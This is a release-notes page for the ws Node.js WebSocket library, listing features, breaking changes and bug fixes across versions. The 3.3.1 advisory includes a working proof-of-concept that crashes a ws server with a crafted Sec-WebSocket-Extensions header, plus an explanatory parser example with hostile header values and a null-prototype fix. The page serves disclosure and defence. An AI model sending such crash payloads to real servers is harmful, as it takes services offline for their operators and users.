Releases: websockets/ws

5.2.0

21 May 19:16

Features

  • Added ability to specify custom headers when rejecting the handshake (#1379).

5.1.1

02 Apr 13:21

Bug fixes

5.1.0

19 Mar 17:24

Features

  • The address argument of the WebSocket constructor can now be a URL
    instance (#1329).
  • The options argument of the WebSocket constructor now accepts any TLS
    option that is also accepted by https.request() (#1332).

5.0.0

06 Mar 14:13

Breaking changes

  • Dropped support for Node.js < 4.5.0 (#1313).
  • The connection is no longer closed if the server does not agree to any of
    the client's requested subprotocols (#1312).
  • net.Socket errors are no longer re-emitted (a4050db).

Features

  • Read backpressure is now properly handled when permessage-deflate is enabled
    (#1302).

4.1.0

22 Feb 08:07

Features

  • Added WebSocketServer.prototype.address() (#1294).
  • Added zlib{Deflate,Inflate}Options options (#1306).

4.0.0

05 Jan 09:42

Breaking changes

  • The close status code is now set to 1005 if the received close frame contains
    no status code (a31b1f6).
  • Error messages and types have been updated (695c5ea).
  • The onerror event handler now receives an ErrorEvent instead of a
    JavaScript error (63e275e).
  • The third argument of WebSocket.prototype.ping() and
    WebSocket.prototype.pong() is no longer a boolean but an optional callback
    (30c9f71).
  • The non-standard protocolVersion and bytesReceived attributes have been
    removed (30c9f71...ee9b5f3).
  • The extensions attribute is no longer an object but a string representing
    the extensions selected by the server (fdec524).
  • The 'headers' event on the client has been renamed to 'upgrade'. Listeners
    of this event now receive only the response argument (1c783c2).
  • The WebSocket.prototype.pause() and WebSocket.prototype.resume() methods
    have been removed to prevent the user from interfering with the state of the
    underlying net.Socket stream (a206e98).

3.3.3

17 Dec 09:25

Bug fixes

  • net.Socket errors are no longer swallowed (beff620).
  • The status code and close reason are now always taken from the close frame if
    received (beff620).

3.3.2

21 Nov 06:46

Bug fixes

  • The parser of the Sec-WebSocket-Extensions header has been rewritten to make
    it spec-compliant (#1240).

3.3.1

08 Nov 17:03

Bug fixes

  • Fixed a DoS vulnerability (c4fe466).

A specially crafted value of the Sec-WebSocket-Extensions header that
used Object.prototype property names as extension or parameter names
could be used to make a ws server crash.

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

The vulnerability has been privately reported by Nick Starke and
Ryan Knell of Sonatype Security Research and promptly fixed. Please
update now!
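
An added example, not code from the ws project or this release page: a simplified header parser showing why extension or parameter names such as constructor break a lookup table built on a plain {} object, next to the same parser using a null-prototype table. The function names, the parser shape and the second and third sample headers are assumptions made for illustration.

```javascript
'use strict';

// Simplified parser for a header shaped like "name; param=value, name2".
// Illustration only: not the ws parser and not spec-compliant.
function parseExtensions(header, makeTable) {
  const offers = makeTable();
  for (const item of header.split(',')) {
    const [name, ...rawParams] = item.split(';').map((s) => s.trim());
    if (name === '') continue;
    const params = makeTable();
    for (const raw of rawParams) {
      if (raw === '') continue;
      const [key, value = true] = raw.split('=').map((s) => s.trim());
      // Lookup by a client-chosen key: on a {} table, "constructor" resolves
      // to the inherited Object.prototype.constructor, not undefined.
      if (params[key] === undefined) params[key] = [];
      params[key].push(value); // TypeError when params[key] is inherited
    }
    if (offers[name] === undefined) offers[name] = [];
    offers[name].push(params);
  }
  return offers;
}

const plainTable = () => ({}); // inherits from Object.prototype
const nullProtoTable = () => Object.create(null); // no inherited keys

// Report the outcome instead of letting the exception escape; in a server
// an uncaught exception on the handshake path terminates the process.
function tryParse(header, makeTable) {
  try {
    return { ok: true, offers: parseExtensions(header, makeTable) };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Constructed sample headers (the first value is the one shown on the page).
const samples = [
  'constructor',
  'permessage-deflate; toString',
  'permessage-deflate; client_max_window_bits=10'
];

for (const header of samples) {
  const weak = tryParse(header, plainTable);
  const hard = tryParse(header, nullProtoTable);
  console.log(JSON.stringify(header), '| plain {}:', weak.ok ? 'parsed' : weak.error,
    '| null-prototype:', hard.ok ? 'parsed' : hard.error);
}
```

Code that looks up client-supplied names in a table should use a null-prototype object, a Map, or an own-property check, and the handshake path should fail the request rather than throw.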

1.1.5

08 Nov 17:02

Bug fixes

  • Fixed a DoS vulnerability (f8fdcd4).